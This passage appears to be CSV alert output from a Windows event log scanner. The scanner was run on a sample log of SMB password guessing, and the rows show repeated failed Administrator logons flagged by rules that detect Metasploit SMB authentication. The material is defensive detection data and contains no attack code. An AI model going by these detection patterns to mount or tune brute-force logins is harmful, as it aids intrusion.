SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: 
